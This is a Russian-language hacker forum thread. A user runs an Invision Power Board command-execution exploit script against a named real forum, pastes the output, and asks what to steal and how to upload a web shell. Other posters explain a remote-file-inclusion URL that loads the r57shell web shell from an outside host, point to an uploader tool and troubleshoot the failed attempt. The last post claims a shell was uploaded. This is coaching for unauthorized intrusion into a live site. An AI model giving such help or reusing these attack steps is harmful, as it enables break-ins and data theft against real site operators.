Даже дошёл как в фильме ) G:\Documents and Settings\Denis>g:\perll\bin\perl.exe g:\s.pl -h www.uo.cln.ru - d /forum/ -l zxc -p zxc -f 2 -v 0 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Invision Power Board 2.* commands execution exploit by RST/GHC ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ [~] SERVER : www.uo.cln.ru [~] PATH : /forum/ [~] LOGIN : zxc [~] PASSWORD : zxc [~] TARGET : 0 - IPB 2.0.* [~] Login ... [ DONE ] [+] SID: 2cd54daebe2bd7d5b888ae5c3dabf720 [~] Try get md5_check ... [ DONE ] [+] MD5_CHECK : bb429f6b6c7f8483343bff5eadff165f [~] Create new message ... [ DONE ] [~] Search message ... [ DONE ] [+] SEARCHID: 5ea7c66e3bf5630885947ad97478cbf0 НУ а дальше то что делать? Что можно украсть? Что за удалённые команды, помогайте
Господа, теперь меня интересует дополнительный вопрос, только что просмотрел мувик : http://rapidshare.de/files/19287127/video.rar.html Вот я не понял как он шелл заливает? Предварительно шелл нуна загрузить куда нить? Содержание qw.php : Так вот этот qw.php нужно куда то грузить? А то я с мувика мало понял - как он вообще так умудрился загрузить? Я сделал всё как он, регнулся, создал топ, нашёл себя, добавляю код который в ридми есть : Но шелл не подгружается. Помогите, почему? updated : знач все кто видел мувик : http://rapidshare.de/files/19287127/video.rar.html вот я делал также, снял мувик, но делал все точка в точку, и нифига не вышло, ацените мой мувик, (800 кб), и скажите что не так? Вот оно обновляется, но шелла почемуто не загружает! мой фильм http://rapidshare.de/files/25150878/help.rar.html
Вообщем не совсем тебя понял! _http://rst.void.ru/download/r57shell.txt Вот этот шелл зачем заливать? Он вообще то присоединяется(приклеивается) типа: _http://site/index.php?page=http://rst.void.ru/download/r57shell.txt. Для заливки используй remview _http://php.spb.ru/remview/. Если права на папку выставленны, то ни какой шелл ты не закачаешь. Ты хоть какие-нибудь команды выполнял типа ls, pwd, cat.... Щас видео посмотрю...
Посмотрел... На форуме версия 2.1.6, а в ReaMe написано про уязвимость версий <=2.1.5. Так что вряд ли прокатит! А вообще с закачкой шелла ты врядли преуспеешь я не думаю что админы этого сайта-форума дураки, чтобы не выставить права! В форуме "Уязвимости форумов" уже упомянули про версию 2.1.6, так что поюзай!
да же бы если была версия 2.1.5 ты бы шелл не загрузил потомучто ты когда нажал "Search" у тебя автоматом стояло "Результаты в виде тем" а надо было : "Результаты в виде сообщений"
Как это 2.1.6? 2.1.4! Посмотри еще раз! Команды делал но 0 реакции - он думает потом скидует на первоночальную строку... дайте КОНКРЕТНЫЕ КОМАНДЫ =)
Да, ты прав, но ошибка там была, заметил? Дырка точнее. Но всё равно, благодоря Химасу, у меня получилось залить шелл.